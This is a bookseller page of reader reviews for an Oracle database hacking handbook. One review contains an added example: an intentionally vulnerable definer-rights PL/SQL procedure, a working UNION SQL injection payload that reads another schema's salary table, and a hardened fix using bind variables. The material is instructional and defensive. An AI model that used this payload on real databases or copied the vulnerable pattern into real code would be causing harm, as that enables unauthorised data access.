David Litchfield has devoted years to relentlessly searching out the flaws in the Oracle database system and creating defenses against them. Now he offers you his complete arsenal to assess and defend your own Oracle systems. This in-depth guide explores every technique and tool used by black hat hackers to invade and compromise Oracle and then it shows you how to find the weak spots and defend them. Without that knowledge, you have little chance of keeping your databases truly secure.
Required Reading for Breaking into Oracle Databases
Published by Thriftbooks.com User, 15 years ago
I've been doing some Oracle research and of course this is the only book on the market that really covers breaking into Oracle, with the exception of The Database Hacker's Handbook, which came out in 2005. Justin Clark's (and others') SQL Injection book published in 2009 also covers some Oracle material, but not enough to make this book obsolete. I bought this book immediately when it came out in 2007 (yeah, I'm super late on the review) but frankly put it down because it was confusing and definitely not suited for anyone who didn't already have a basic exposure to Oracle. I picked it up again in late 2008 after doing the background research on Oracle security and administration. Armed with a better understanding of Oracle in general, I attacked the book again, focusing on SQL injection in the Oracle PL/SQL packages with the goal of going from locating an open TNS listener to getting a shell on the system. The author is well known in the security industry and one of only a handful of Oracle security "experts", so the skill level was definitely there.

Breakdown of the chapters:
Introduction
Chapter 1 Overview of the Oracle RDBMS
Chapter 2 The Oracle Network Architecture
Chapter 3 Attacking the TNS Listener and Dispatchers
Chapter 4 Attacking the Authentication Process
Chapter 5 Oracle and PL/SQL
Chapter 6 Triggers
Chapter 7 Indirect Privilege Escalation
Chapter 8 Defeating Virtual Private Databases
Chapter 9 Attacking Oracle PL/SQL Web Applications
Chapter 10 Running Operating System Commands
Chapter 11 Accessing the File System
Chapter 12 Accessing the Network
Appendix A Default Usernames and Passwords

I think most of the background chapters are "adequate" and the exploitation chapters are very good. At the time of publishing the author released code for vulnerabilities that were brand new. I do have issues with Chapter 5, Oracle and PL/SQL. I think the coverage of PL/SQL is only adequate if you already know PL/SQL.
It took me going and reading a lot of other material on the net about PL/SQL to understand things that are glossed over in the chapter. The chapter is good and covers tons of material, but from an attacking-Oracle perspective more time should have been spent on teaching the reader how to use the "describe" package option in PL/SQL to describe the package to learn how to craft your queries correctly, as well as how to research and write your own SQL injection queries based on published vulnerabilities. More coverage on default privileges and roles would have been useful as well. Again, if you have been an Oracle DBA, you understand this already. If you are an Oracle security researcher, you know this already. If you are a pentester trying to get some Oracle under your belt, you'll have to go pick up another book or hit the internet to get the background material. The other chapters are good and they cover their stated topics. More examples would have been nice, of course. A couple of times we are told to check out
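The two things this reviewer wishes Chapter 5 had taught, describing a package before attacking it and then crafting an injection against a definer-rights PL/SQL routine, are shown below as an added example. This is not code from the book, from David Litchfield, or from the reviewer; the schema APP_OWNER, the tables ORDERS and SALARIES, the procedure LIST_ORDERS and the low-privileged user LOW_PRIV are all hypothetical names assumed for illustration.

```sql
-- Added example (hypothetical schema and objects, not from the book).
-- Step 1: the pattern Chapter 5 is about. A procedure owned by a privileged
-- schema (AUTHID DEFINER is the default) builds dynamic SQL by concatenating
-- its argument, and a low-privileged user is granted EXECUTE on it.
CREATE OR REPLACE PROCEDURE app_owner.list_orders (p_customer IN VARCHAR2)
AS
  TYPE t_cur IS REF CURSOR;
  c       t_cur;
  v_id    NUMBER;
  v_total NUMBER;
BEGIN
  -- VULNERABLE: p_customer is spliced straight into the statement text,
  -- and the statement runs with APP_OWNER's privileges, not the caller's.
  OPEN c FOR 'SELECT id, total FROM app_owner.orders '
          || 'WHERE customer = ''' || p_customer || '''';
  LOOP
    FETCH c INTO v_id, v_total;
    EXIT WHEN c%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(v_id || ' ' || v_total);
  END LOOP;
  CLOSE c;
END;
/
GRANT EXECUTE ON app_owner.list_orders TO low_priv;

-- Step 2 (as LOW_PRIV): what "describe the package" buys you. The argument
-- list tells you how many parameters to supply and which are strings.
DESCRIBE app_owner.list_orders
-- Argument Name   Type       In/Out  Default?
-- P_CUSTOMER      VARCHAR2   IN

-- Step 3 (as LOW_PRIV): the payload. The SELECT that the procedure builds
-- becomes
--   SELECT id, total FROM app_owner.orders WHERE customer = 'x'
--   UNION SELECT emp_id, salary FROM app_owner.salaries WHERE '1'='1'
-- The trailing quote the procedure appends closes the '1 literal, so no
-- comment marker is needed. Column count and types must match the original
-- SELECT (two numeric columns here). SALARIES is readable only because the
-- cursor runs as APP_OWNER; LOW_PRIV has no grant on it.
SET SERVEROUTPUT ON
BEGIN
  app_owner.list_orders(
    'x'' UNION SELECT emp_id, salary FROM app_owner.salaries WHERE ''1''=''1');
END;
/

-- Step 4: the hardened form. The value is passed as a bind variable, so it
-- can never change the statement's structure, and AUTHID CURRENT_USER makes
-- the cursor run with the caller's privileges instead of the owner's.
CREATE OR REPLACE PROCEDURE app_owner.list_orders (p_customer IN VARCHAR2)
  AUTHID CURRENT_USER
AS
  TYPE t_cur IS REF CURSOR;
  c       t_cur;
  v_id    NUMBER;
  v_total NUMBER;
BEGIN
  -- FIXED: bind, do not concatenate. The payload from step 3 is now just a
  -- customer name that matches no row.
  OPEN c FOR 'SELECT id, total FROM app_owner.orders WHERE customer = :cust'
    USING p_customer;
  LOOP
    FETCH c INTO v_id, v_total;
    EXIT WHEN c%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(v_id || ' ' || v_total);
  END LOOP;
  CLOSE c;
END;
/
```

Two caveats a practitioner would want. First, AUTHID CURRENT_USER is only a fix if the caller legitimately has SELECT on APP_OWNER.ORDERS; otherwise the procedure stops working for its intended users, and the bind variable alone is the essential change. Second, parts of a statement that cannot be bound (a table or column name chosen at runtime) must be validated with DBMS_ASSERT (SIMPLE_SQL_NAME, SQL_OBJECT_NAME, ENQUOTE_LITERAL) before concatenation. The UNION above reads data; the more dangerous variant the book covers is injecting a call to an attacker-owned function that performs DDL under the definer's privileges, which is why the privilege context of the routine matters as much as the quoting.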
Excellent Book
Published by Thriftbooks.com User, 17 years ago
I found this book to be an excellent resource, and use it quite often at work.
Nice to read a book with no waffle!!!
Published by Thriftbooks.com User, 18 years ago
Have just read this book this week and it was a nice read, especially after some of the c***p I have been reading lately! Basically, if your systems estate has Oracle, then you MUST read this. I like this book, it's good and the author really does know his stuff. It's a lightweight (easy to carry) book and good value for money. Some nice C / Java snippets, so it helps if you know C.
This book is like a knife... you can cut the bread or you can kill with it...
Published by Thriftbooks.com User, 18 years ago
When I started with this book I was both amazed and afraid. With this book, all those tricks of SQL injection in Oracle have started to become public knowledge. So this book is like a knife... you can cut the bread or you can kill with it. :) But let's be honest. It is always better to know, especially when you are a DBA, because you are always far behind the attackers, who probably spend their lifetime browsing the code for security flaws. For that reason everyone who is responsible for practical Oracle security should read this book and learn how to defend. I believe that this book will grow in the future and will provide more and more examples. That is the game we are used to playing. New releases, new bugs, new flaws, new workarounds and finally some vendor final fixes. That is how the Oracle security process cycle should work. It is worth mentioning that, in terms of quality, David Litchfield has started a completely new period in the cycle.
Oracle Hacker's Handbook review
Published by Thriftbooks.com User, 18 years ago
The Oracle Hacker's Handbook (OHH) is a collection of techniques that could be used by an attacker to gain unauthorised access to an Oracle database server up to and including 10gR2. Most of these techniques are currently not public, so OHH is both new knowledge for an attacker and a vital warning to those responsible for securing Oracle servers. In a nutshell, the new attacks include how to gain the version number remotely, brute force usernames, gain passwords/hashes from the OS, attack the listener, escalate privilege internally through PL/SQL packages and triggers both directly and indirectly, as well as defeating VPD. These attacks are illustrated both directly and through the application server. By using these techniques and by accessing the Oracle files directly through the OS, an attacker would be able to gain DBA privileges on most secured servers. Additionally, using the code examples included, an attacker could gain password hashes and then the actual DBA clear-text password from the network using the password decryption code included. This will work even with complex quoted passwords. This is the most effective public analysis of security vulnerabilities in Oracle products so far.

OHH is a technical book and not really an introduction to the subject, though it could be picked up reasonably quickly as the text avoids unnecessary jargon. The book could be enhanced by including more on defense strategies, such as how to prepare and respond to an attack where the attacker has gained the clear-text DBA password. OHH has a free download site for pre-written proof-of-concept code, which helps avoid unnecessary typing. From a general readability point of view the book is concise and to the point. The sections are logically laid out and the examples have worked when tested. I would recommend those involved in Oracle security to read this book as soon as they can.